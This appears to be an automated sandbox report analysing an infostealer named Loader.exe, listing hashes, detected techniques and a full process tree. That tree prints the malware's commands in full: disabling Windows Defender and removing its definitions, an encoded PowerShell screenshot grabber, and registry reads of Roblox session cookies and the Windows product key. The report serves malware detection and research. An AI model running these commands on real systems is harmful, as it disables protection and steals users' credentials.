Resubmissions

26/03/2025, 16:44

250326-t9brya1ls3 10

26/03/2025, 16:43

250326-t8ahgsyxbv 10

Analysis

  • max time kernel
    43s
  • max time network
    44s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 16:43

General

  • Target

    Loader/Loader.exe

  • Size

    7.5MB

  • MD5

    251ac55d55b47ec078473eeaa1e510e7

  • SHA1

    1126ce753d5f4916e5e4f0fa5fa002bd7bce181b

  • SHA256

    60bbd89cca19b257dd70d37ce4907d86e96b2711da5d945dd4204a88edad318b

  • SHA512

    90120ff2ac2ad04758279695b43b45759829535d7b8519a2907bc2b1169a1e510a7e383e2347e7f15225de1a924bd9b77637d9c77e7838d99b062c279ae3912f

  • SSDEEP

    196608:pWOgoiwfI9jUCH0+n4/JKIYJmg+Irj+dD1SAxw:28IHU+GJPYf9ydD1s

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:620
    • C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe
      "C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4520
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2596
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1076
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4084
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2252
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5136
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5184
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5808
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5652
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2000
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4088
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1988
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3376
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:400
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3212
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:4772
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2052
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2228
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5536
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:5280
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3144
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3280
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mmcl32bp\mmcl32bp.cmdline"
              5⤵
                PID:1544
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES709C.tmp" "c:\Users\Admin\AppData\Local\Temp\mmcl32bp\CSCAFCEE0D790764925BAC14C7EA2945899.TMP"
                  6⤵
                    PID:4280
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3648
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:6120
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:5344
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1728
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1852
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:2460
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1912
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:2336
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:212
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:2480
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                          3⤵
                            PID:1836
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1096
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:4808
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5924
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "getmac"
                              3⤵
                                PID:1240
                                • C:\Windows\system32\getmac.exe
                                  getmac
                                  4⤵
                                    PID:3432
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI6202\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\M6GyL.zip" *"
                                  3⤵
                                    PID:3088
                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6202\rar.exe
                                      C:\Users\Admin\AppData\Local\Temp\_MEI6202\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\M6GyL.zip" *
                                      4⤵
                                      • Executes dropped EXE
                                      PID:5540
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                    3⤵
                                      PID:5188
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic os get Caption
                                        4⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5068
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                      3⤵
                                        PID:5568
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic computersystem get totalphysicalmemory
                                          4⤵
                                            PID:4440
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                          3⤵
                                            PID:2052
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              4⤵
                                                PID:4524
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                              3⤵
                                                PID:2984
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4872
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                3⤵
                                                  PID:1852
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_VideoController get name
                                                    4⤵
                                                    • Detects videocard installed
                                                    PID:5448
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                  3⤵
                                                    PID:4132
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4844

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                Filesize

                                                2KB

                                                MD5

                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                SHA1

                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                SHA256

                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                SHA512

                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                0b9ebff96ce87bb2948f7decf425a335

                                                SHA1

                                                3172582f4a97c15d0c5162c547fe81b811de8e74

                                                SHA256

                                                9e2d1f92a7985c38161bb08726c708271673b6644d66b327b72e5023a53daf2c

                                                SHA512

                                                4eeaf75114389ca025b6eb589c160f03ddceb2e2c67196f05cdf2da5c946c617816056265a0420dcae13c19781a291ef8c456cd08bca6760bbcdd89a83e96357

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                944B

                                                MD5

                                                47d9df7fab0d0c96afdd2ca49f2b5030

                                                SHA1

                                                92583883bcf376062ddef5db2333f066d8d36612

                                                SHA256

                                                0f244dd39698dace2c650435886b1175ea01131e581d6c13888576c07fa40b02

                                                SHA512

                                                1844ce4f35849b70c246127482040986caa1bbae2d81119c77e9841f2a3280aabae0ad0db52fc29fe48023b4f4c073fe759b1f54e70e1562289d5e349c015200

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Filesize

                                                1KB

                                                MD5

                                                2a99c12bc18d9cf34c05d0bb099685cb

                                                SHA1

                                                679e4a313949f1e2cd0553c8b9cfbd3aded62b13

                                                SHA256

                                                fda39902bce2f2c343bf3243d50f55444284057205fd2c5c379f265242731003

                                                SHA512

                                                5e154f7dbe3aec7a0da7ae5c32f0eb181ab4649d4722af3d3d069c0b038e483c7e19efcb4e9280b056e0dc699c39f97f36653a279ced22fb611d13bb3c9ea1d8

